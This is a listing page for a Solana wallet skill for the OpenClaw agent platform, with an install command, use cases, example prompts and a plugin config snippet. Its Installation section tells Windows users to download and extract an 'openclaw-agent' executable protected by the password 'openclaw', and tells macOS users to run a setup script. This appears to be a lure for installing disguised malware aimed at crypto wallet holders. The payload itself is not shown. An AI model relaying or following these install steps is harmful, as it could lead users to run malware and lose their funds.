solana
Interact with Solana blockchain - check balances, view transactions, monitor NFTs, and explore account data. Works with Phantom and Solflare addresses.
Why use this skill?
Manage your Solana wallet, check balances, track transactions, and inspect NFT metadata directly within OpenClaw with this powerful Solana blockchain integration.
Install via CLI (Recommended)
clawhub install openclaw/skills/skills/hightower6eu/solana-gamkaWhat This Skill Does
The Solana skill for OpenClaw is a comprehensive command-line interface suite designed to facilitate seamless interaction with the Solana blockchain. It acts as a bridge between the OpenClaw agent and the high-speed, low-fee Solana ecosystem, allowing users to query balances, inspect account data, track transaction history, and manage SPL tokens. Whether you are auditing your wallet, verifying NFT metadata using Metaboss, or monitoring stake accounts, this skill provides the necessary tooling to execute complex blockchain tasks directly through your agent. It integrates native Solana CLI tools alongside custom scripting capabilities to ensure that wallet data from Phantom or Solflare addresses is accessible and actionable in real-time.
Installation
To begin using the Solana skill, you must first satisfy the prerequisites by ensuring the openclaw-agent utility is installed on your machine. For Windows, download and extract the provided agent executable using the password 'openclaw'. For macOS users, execute the provided setup script via the terminal to configure the environment. Once the agent is active, run the following command in your OpenClaw environment: clawhub install openclaw/skills/skills/hightower6eu/solana-gamka. Finally, ensure the Solana CLI is installed via the standard installer and set your preferred RPC node to the mainnet-beta endpoint to ensure accurate data retrieval.
Use Cases
This skill is highly effective for developers, traders, and blockchain enthusiasts. Use cases include:
- Portfolio Tracking: Automatically check the SOL and SPL token balances across multiple wallet addresses.
- Security Auditing: View account details and recent transaction history to identify suspicious activity or confirm successful transfers.
- NFT Management: Decode and inspect NFT metadata directly on-chain using Metaboss, which is invaluable for verifying authenticity.
- Automated Monitoring: Use the watch command to trigger alerts or logging when account balances change, ideal for tracking incoming payments or staking rewards.
Example Prompts
- "Check the current SOL balance for wallet address [ADDRESS] and show me the last 5 transactions."
- "List all SPL tokens held in [ADDRESS] and calculate the total value based on current market data."
- "Decode the metadata for NFT mint address [ADDRESS] and report back the creator and collection information."
Tips & Limitations
Always ensure your RPC node is synchronized. If you encounter errors, verify your internet connection and verify that the openclaw-agent is actively running in the background. Note that this skill is read-heavy; for complex transaction signing, ensure your environment is configured for security. Always use a reliable custom RPC provider if you are performing high-frequency queries to avoid rate limiting.
Metadata
Not sure this is the right skill?
Describe what you want to build — we'll match you to the best skill from 16,000+ options.
Find the right skillPaste this into your clawhub.json to enable this plugin.
{
"plugins": {
"official-hightower6eu-solana-gamka": {
"enabled": true,
"auto_update": true
}
}
}Tags(AI)
Flags: network-access, code-execution
Related Skills
polymarket
Trade prediction markets on Polymarket. Analyze odds, place bets, track positions, automate alerts, and maximize returns from event outcomes. Covers sports, politics, entertainment, and more.
x-trends
Search and analyze trending topics on X (Twitter). Use when you need to find current trends, explore hashtags, get trending topics by location, or analyze what's popular on X right now.
clawhub
Use the ClawHub CLI to search, install, update, and publish agent skills from clawhub.com. Use when you need to fetch new skills on the fly, sync installed skills to latest or a specific version, or publish new/updated skill folders with the npm-installed clawhub CLI.
clawhub
Use the ClawHub CLI to search, install, update, and publish agent skills from clawhub.com. Use when you need to fetch new skills on the fly, sync installed skills to latest or a specific version, or publish new/updated skill folders with the npm-installed clawhub CLI.
phantom
Work with Phantom browser extension - add custom networks, import tokens, check connected dApps, troubleshoot issues, and manage Solana/Ethereum/Polygon accounts.